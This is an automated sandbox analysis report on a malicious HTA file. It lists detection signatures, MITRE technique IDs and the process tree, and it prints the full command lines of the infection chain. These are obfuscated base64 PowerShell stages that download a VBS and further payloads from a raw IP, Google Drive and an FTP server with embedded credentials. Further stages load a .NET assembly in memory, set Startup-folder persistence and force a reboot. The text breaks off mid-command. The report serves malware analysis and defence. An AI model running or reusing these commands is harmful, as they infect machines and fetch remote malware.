db31b117dac71c5b27b572527b40c756df4c04b94e33dafc6e798dff6c69e904

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-10-2024 06:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

necgoodthingswithgreatthingsentirethingstobeinonline.hta
Size

130KB
MD5

611e9ca8b26d298c4d384206e385e10c
SHA1

73544dca3a9bd4907bd4c9027b0468b0f8094173
SHA256

db31b117dac71c5b27b572527b40c756df4c04b94e33dafc6e798dff6c69e904
SHA512

8c47b4d1a5419c1828ca4efaeeffc19a843a7f52113b5ebe2a5ff0a9bb385121496e6c56c8666414652f856d743de3e92c49ba9ab2cdad4124a9a75a2cae64d5
SSDEEP

96:Eam7kD8LnZNp6D8OknZNpjwoOoYRMOD8ldD82q3bZknZNpAuED8r7T:Ea2kYNv6Ydvj9GYnY6vvEYXT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
22	1384	PoWERSHelL.EXe
25	4932	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
3432	powershell.exe
1384	PoWERSHelL.EXe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4400	powershell.exe
4932	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWERSHelL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	PoWERSHelL.EXe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
1384	PoWERSHelL.EXe
1384	PoWERSHelL.EXe
3432	powershell.exe
3432	powershell.exe
4400	powershell.exe
4400	powershell.exe
4932	powershell.exe
4932	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1384	PoWERSHelL.EXe
Token: SeDebugPrivilege	3432	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 4812 wrote to memory of 1384	4812	mshta.exe	84
PID 4812 wrote to memory of 1384	4812	mshta.exe	84
PID 4812 wrote to memory of 1384	4812	mshta.exe	84
PID 1384 wrote to memory of 3432	1384	PoWERSHelL.EXe	89
PID 1384 wrote to memory of 3432	1384	PoWERSHelL.EXe	89
PID 1384 wrote to memory of 3432	1384	PoWERSHelL.EXe	89
PID 1384 wrote to memory of 940	1384	PoWERSHelL.EXe	93
PID 1384 wrote to memory of 940	1384	PoWERSHelL.EXe	93
PID 1384 wrote to memory of 940	1384	PoWERSHelL.EXe	93
PID 940 wrote to memory of 2136	940	csc.exe	94
PID 940 wrote to memory of 2136	940	csc.exe	94
PID 940 wrote to memory of 2136	940	csc.exe	94
PID 1384 wrote to memory of 1908	1384	PoWERSHelL.EXe	99
PID 1384 wrote to memory of 1908	1384	PoWERSHelL.EXe	99
PID 1384 wrote to memory of 1908	1384	PoWERSHelL.EXe	99
PID 1908 wrote to memory of 4400	1908	WScript.exe	100
PID 1908 wrote to memory of 4400	1908	WScript.exe	100
PID 1908 wrote to memory of 4400	1908	WScript.exe	100
PID 4400 wrote to memory of 4932	4400	powershell.exe	102
PID 4400 wrote to memory of 4932	4400	powershell.exe	102
PID 4400 wrote to memory of 4932	4400	powershell.exe	102

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\necgoodthingswithgreatthingsentirethingstobeinonline.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4812
- C:\Windows\SysWOW64\wiNDOwspowerSHEll\V1.0\PoWERSHelL.EXe
  "C:\Windows\SysteM32\wiNDOwspowerSHEll\V1.0\PoWERSHelL.EXe" "POweRsHEll -Ex BYPAss -noP -W 1 -C dEVICECrEDenTialdepLOymENt.ExE ; iEx($(ieX('[SySTem.tExt.enCoding]'+[Char]58+[CHAr]58+'Utf8.GetsTriNG([SyStEM.Convert]'+[CHAR]0x3A+[CHAr]0X3A+'frOmbAsE64STrING('+[CHAR]34+'JEU0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJFUmRFZkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSWp6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZG1OT1FIT2p6cWUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6em9sbkwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJzanhDYlhYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhjbEFNQU92RUVXIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFpabWloUyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEU0OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTQuMTcxLjE1Ny82ODAvc3lzdGVtcHJvZy52YnMiLCIkRW52OkFQUERBVEFcc3lzdGVtcHJvZy52YnMiLDAsMCk7c1RhUnQtU0xFZXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc3lzdGVtcHJvZy52YnMi'+[CHaR]34+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1384
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPAss -noP -W 1 -C dEVICECrEDenTialdepLOymENt.ExE
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3432
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\32u5r4sr\32u5r4sr.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:940
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BB3.tmp" "c:\Users\Admin\AppData\Local\Temp\32u5r4sr\CSC44760F551A4448F4903D67DFB4E25E0.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2136
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\systemprog.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALwAxADAANwAuADEANwAzAC4ANAAuADkALw' + [char]66 + 'hAGMAdA' + [char]66 + 'pAHYAZQ' + [char]66 + 'kAGwAbAAuAHQAeA' + [char]66 + '0ACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgACcASQ' + [char]66 + 'WAEYAcg' + [char]66 + 'wACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQ' + [char]66 + 'NAHQAZQ' + [char]66 + 'HAC4AKQAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgACgAZA' + [char]66 + 'hAG8ATAAuAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHQAbg' + [char]66 + 'lAHIAcg' + [char]66 + '1AEMAOgA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAKQAgACkAIAAnAEEAJwAgACwAIAAnAJMhOgCTIScAIAAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAFIALg' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bADsAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIAA9ACAAWA' + [char]66 + 'QAFUAdQ' + [char]66 + 'oACQAOwApACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AZw' + [char]66 + '5AGQAcA' + [char]66 + '6ACQAIAA9ACAAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AZw' + [char]66 + '5AGQAcA' + [char]66 + '6ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAZw' + [char]66 + '5AGQAcA' + [char]66 + '6ACQAOwApACgAZQ' + [char]66 + 'zAG8AcA' + [char]66 + 'zAGkAZAAuAGcAeQ' + [char]66 + 'kAHAAegAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAATA' + [char]66 + 'MAEQALwAxADAALw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAeQ' + [char]66 + 'kAHAAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwApACkAKQAgADQANgAsADQANgAsADYANQAsADUANQAsADMANQAsADkANAAsADkAOAAsADcANwAsADYANgAsADUAOAAsACAANwA5ACwAIAAxADIAMQAsACAAMQA3ACAALAA5ADEAMQAgACwAMAA3ACAALAA2ADYAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAsACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AZw' + [char]66 + '5AGQAcA' + [char]66 + '6ACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAeQ' + [char]66 + 'kAHAAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAeQ' + [char]66 + 'kAHAAegAkADsAZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAA7ADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + [char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIAbA' + [char]66 + 'wAGsAdAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAAPQAgAEIAbA' + [char]66 + 'wAGsAdAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAALA' + [char]66 + 'CAEsATA' + [char]66 + 'SAFUAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AcA' + [char]66 + 'qAHYAZg' + [char]66 + 'uACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHAAag' + [char]66 + '2AGYAbgAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHAAag' + [char]66 + '2AGYAbgAkADsAfQA7ACAAKQAnAHQATw' + [char]66 + 'MAGMAXw' + [char]66 + 'LAGEAMw' + [char]66 + 'aAGYAbw' + [char]66 + 'YADIASg' + [char]66 + 'KAHIAVg' + [char]66 + 'oAG0AVgA5AGMAbQA5AFgAcw' + [char]66 + '1AFgAbQ' + [char]66 + 'qADEAZwAxACcAIAArACAAcQ' + [char]66 + 'uAGQAaA' + [char]66 + '0ACQAKAAgAD0AIA' + [char]66 + 'xAG4AZA' + [char]66 + 'oAHQAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAMgA0AHUAWA' + [char]66 + 'KAFQAcQ' + [char]66 + 'hAG0AZw' + [char]66 + '5AE0AdA' + [char]66 + 'GAHoAYQ' + [char]66 + 'rAFAAUgAxAHEAXw' + [char]66 + 'JAHYARw' + [char]66 + 'pAFgATg' + [char]66 + 'kAHEAYQ' + [char]66 + 'OADEAJwAgACsAIA' + [char]66 + 'xAG4AZA' + [char]66 + 'oAHQAJAAoACAAPQAgAHEAbg' + [char]66 + 'kAGgAdAAkAHsAIAApACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAcQ' + [char]66 + 'uAGQAaA' + [char]66 + '0ACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHUAbw' + [char]66 + 'XAFoAVAAkAHsAIAApACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAA7AA==';$hlwnc = $qKKzc; ;$hlwnc = $qKKzc.replace('уЦϚ' , 'B') ;;$jwvqp = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hlwnc ) ); $jwvqp = $jwvqp[-1..-$jwvqp.Length] -join '';$jwvqp = $jwvqp.replace('%XRqhI%','C:\Users\Admin\AppData\Roaming\systemprog.vbs');powershell $jwvqp
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4400
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$thdnq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$thdnq = ($thdnq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$thdnq = ($thdnq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$nfvjp = (New-Object Net.WebClient);$nfvjp.Encoding = [System.Text.Encoding]::UTF8;$nfvjp.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Roaming\systemprog.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zpdyg = (New-Object Net.WebClient);$zpdyg.Encoding = [System.Text.Encoding]::UTF8;$zpdyg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $zpdyg.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$zpdyg.dispose();$zpdyg = (New-Object Net.WebClient);$zpdyg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zpdyg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Roaming\systemprog.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.lldevitca/9.4.371.701//:ptth' , $huUPX , 